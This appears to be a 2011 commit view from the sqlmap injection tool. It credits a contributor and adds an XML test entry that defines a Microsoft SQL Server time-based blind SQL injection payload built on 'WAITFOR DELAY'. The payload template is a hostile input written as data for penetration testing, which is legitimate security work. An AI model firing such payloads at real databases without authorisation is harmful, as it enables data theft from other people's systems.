added MSSQL time based vector

This commit is contained in:
Miroslav Stampar 2011-01-18 02:05:18 +00:00
parent 3822b494ea
commit bdcb10cdab
2 changed files with 24 additions and 0 deletions

View File

@ -282,6 +282,10 @@ Adrian Pastor <ap@gnucitizen.org>
Chris Patten <cpatten@sunera.com>
for reporting a bug in the blind SQL injection bisection algorithm
Steve Pinkham <steve.pinkham@gmail.com>
for suggesting a feature
for providing a new sql injection vector (MSSQL time based)
Adam Pridgen <adam.pridgen@gmail.com>
for suggesting some features

View File

@ -1700,6 +1700,26 @@ Formats:
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase AND time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
<payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
<stype>5</stype>